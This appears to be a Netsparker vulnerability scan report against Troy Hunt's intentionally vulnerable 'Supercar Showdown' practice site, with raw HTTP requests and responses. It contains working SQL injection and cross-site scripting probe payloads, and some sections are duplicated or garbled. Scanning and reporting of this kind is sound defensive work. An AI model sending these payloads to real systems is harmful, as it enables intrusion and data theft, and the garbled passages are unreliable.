Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2265
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Register - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
IMPORTANT: 1 TOTAL, 1 CONFIRMED
6 Cookie Not Marked as Secure
Netsparker identified a cookie not marked as secure and transmitted over HTTPS.
This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic, or following a successful man-in-the-middle attack.
Impact: This cookie will be transmitted over a HTTP connection; therefore, if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a man-in-the-middle attack, he/she can force the victim to make an HTTP request to steal the cookie.
Actions to Take: 1. See the remedy for solution. 2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)
Remedy: Mark all cookies used within the application as secure.
Required Skills for Successful Exploitation: To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to understand layer 2, have physical access to systems either as waypoints for the traffic, or have locally gained access to a system between the victim and the web server.
External References: .NET Cookie.Secure Property; How to Create Totally Secure Cookies
Classification: OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-614, CAPEC-102, WASC-15
6.1 /Account/Login CONFIRMED https://hackyourselffirst.troyhunt.com/Account/Login
Identified Cookie: AuthCookie
Request:
POST /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/Account/Login
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 57
Content-Type: application/x-www-form-urlencoded

Email=netsparker%40example.com&Password=3&RememberMe=true
Response:
HTTP/1.1 302 Found
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:00 GMT
Location: http://hackyourselffirst.troyhunt.com/
Server: Microsoft-IIS/8.0
Set-Cookie: AuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Password=Mw==; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Email=netsparker@example.com; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 155
Content-Type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://hackyourselffirst.troyhunt.com/">here</a>.</h2></body></html>
IMPORTANT: 1 TOTAL
7 Out-of-date Version (Microsoft SQL Server)
Netsparker identified you are using an out-of-date version of Microsoft SQL Server.
Impact: Since this is an old version of the software, it may be vulnerable to attacks.
Remedy: Please upgrade your installation of Microsoft SQL Server to the latest stable version.
Classification: OWASP 2010-A6, OWASP 2013-A9, PCI V2.0-6.1, PCI V3.0-6.1, CAPEC-310
7.1 /Make/1 http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Identified Version: 110922217
Latest Version: 12002000
Vulnerability Database: Result is based on 18/08/2014 vulnerability database content
Certainty
Request:
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:55 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>[inline ASP.NET error-page stylesheet omitted]</style></head>
<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please revie…
MEDIUM: 1 TOTAL, 1 CONFIRMED
8 Critical Form Served over HTTP
Netsparker detected that a critical form is served over HTTP.
Impact: If an attacker can carry out a man-in-the-middle attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or changing the action of the HTTP code to steal the user's password. Even though the target page is HTTPS, this does not protect the system against man-in-the-middle attacks.
This issue is important as it negates the use of SSL as a privacy protection barrier.
Actions to Take: 1. See the remedy for solution. 2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.
Remedy: All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.
Classification: OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
8.1 /Account/Login CONFIRMED http://hackyourselffirst.troyhunt.com/Account/Login
Form target action: https://hackyourselffirst.troyhunt.com/Account/Login
Request:
GET /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2549
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Log in - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li><…
MEDIUM: 3 TOTAL
9 [Possible] Cross-site Scripting
Netsparker detected possible cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
Although Netsparker believes there is a cross-site scripting in here, it could not confirm it. We strongly recommend investigating the issue manually to ensure it is cross-site scripting and needs to be addressed.
Impact: There are many different attacks that can be leveraged through the use of XSS, including:
- Hijacking user's active session
- Changing the look of the page within the victim's browser
- Mounting a successful phishing attack
- Intercepting data and performing man-in-the-middle attacks
Remedy: This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered/encoded. Output should be filtered/encoded according to the output format and location.
There are a number of pre-defined, well structured whitelist libraries available for many different environments. Good examples of these include OWASP Reform and Microsoft Anti-cross-site scripting libraries.
Remedy References: [ASP.NET] - Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet
External References: XSS Cheat Sheet; OWASP - cross-site scripting; XSS Shell; XSS Tunnelling
Classification: OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
9.1 /api/vote http://hackyourselffirst.troyhunt.com/api/vote
Parameters:
Parameter | Type | Value
userId | POST | 1
supercarId | POST | 3
comments | POST | '"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>
Notes: Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
Certainty
Request:
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 90
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments='"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>

Response:
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:47 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 2985
Content-Type: application/json; charset=utf-8
Expires: -1

{"Message":"An error has occurred.","ExceptionMessage":"Unclosed quotation mark after the character string '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>)'.\r\nIncorrect syntax near '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>)'.","ExceptionType":"System.Data.SqlClient.SqlException","StackTrace":"   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)\r\n   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)\r\n   at System.Data.SqlClient.SqlCommand.RunExecuteNonQueryTds(String methodName, Boolean async, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.InternalExecuteNonQuery(TaskCompletionSource`1 completion, String methodName, Boolean sendToPipe, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.ExecuteNonQuery()\r\n   at Web.Controllers.VoteController.Post(Vote vote)\r\n   at lambda_method(Closure , Object , Object[] )\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.<>c__DisplayClass10.<GetExecutor>b__9(Object instance, Object[] methodParameters)\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.Execute(Object instanc…
9.2 /api/admin http://hackyourselffirst.troyhunt.com/api/admin?nsextt=%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt
Parameters:
Parameter | Type | Value
nsextt | GET | "--></style></scRipt><scRipt>netsparker(0x0002E0)</scRipt>
Notes: Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
Certainty
Request:
GET /api/admin?nsextt=%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x0002E0)%3C/scRipt%3E HTTP/1.1
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 155Content-Type texthtml charset=utf-8
lthtmlgtltheadgtlttitlegtObject movedlttitlegtltheadgtltbodygtlth2gtObject moved to lta href=httphackyourselffirsttroyhuntcomgthereltagtlth2gtltbodygtlthtmlgt
IMPORTANT: 1 TOTAL

7 Out-of-date Version (Microsoft SQL Server)
Netsparker identified you are using an out-of-date version of Microsoft SQL Server.

Impact: Since this is an old version of the software, it may be vulnerable to attacks.

Remedy: Please upgrade your installation of Microsoft SQL Server to the latest stable version.

Classification: OWASP 2010-A6, OWASP 2013-A9, PCI V2.0-6.1, PCI V3.0-6.1, CAPEC-310

7.1 /Make/1
http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA

Identified Version: 110922217
Latest Version: 12002000
Vulnerability Database: Result is based on 18/08/2014 vulnerability database content.

Certainty:

Request:
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response:
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:55 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; } @media screen and (max-width: 639px) { pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; } } @media screen and (max-width: 479px) { pre { width: 280px; } }</style></head>
<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please revie…
MEDIUM: 1 TOTAL, CONFIRMED: 1

8 Critical Form Served over HTTP
Netsparker detected that a critical form is served over HTTP.

Impact: If an attacker can carry out a man-in-the-middle attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or changing the action of the HTTP code to steal the user's password. Even though the target page is HTTPS, this does not protect the system against man-in-the-middle attacks.

This issue is important as it negates the use of SSL as a privacy protection barrier.

Actions to Take:
1. See the remedy for solution.
2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.

Remedy: All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.

Classification: OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04

8.1 /Account/Login CONFIRMED
http://hackyourselffirst.troyhunt.com/Account/Login

Form target action: https://hackyourselffirst.troyhunt.com/Account/Login

Request:
GET /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2549
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Log in - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li><l…
MEDIUM: 3 TOTAL

9 [Possible] Cross-site Scripting
Netsparker detected possible cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.

This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

Although Netsparker believes there is a cross-site scripting in here, it could not confirm it. We strongly recommend investigating the issue manually to ensure it is cross-site scripting and needs to be addressed.

Impact: There are many different attacks that can be leveraged through the use of XSS, including:
- Hijacking users' active session
- Changing the look of the page within the victim's browser
- Mounting a successful phishing attack
- Intercepting data and performing man-in-the-middle attacks

Remedy: This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered/encoded. Output should be filtered/encoded according to the output format and location.

There are a number of pre-defined, well structured whitelist libraries available for many different environments. Good examples of these include the OWASP Reform and Microsoft Anti-cross-site scripting libraries.

Remedy References: [ASP.NET] - Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet

External References: XSS Cheat Sheet; OWASP - cross-site scripting; XSS Shell; XSS Tunnelling

Classification: OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08

9.1 /api/vote
http://hackyourselffirst.troyhunt.com/api/vote

Parameters:
Parameter | Type | Value
userId | POST | 1
supercarId | POST | 3
comments | POST | '"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>

Notes: Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause cross-site scripting vulnerabilities in browsers with auto MIME sniffing such as Internet Explorer.

Certainty:
ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
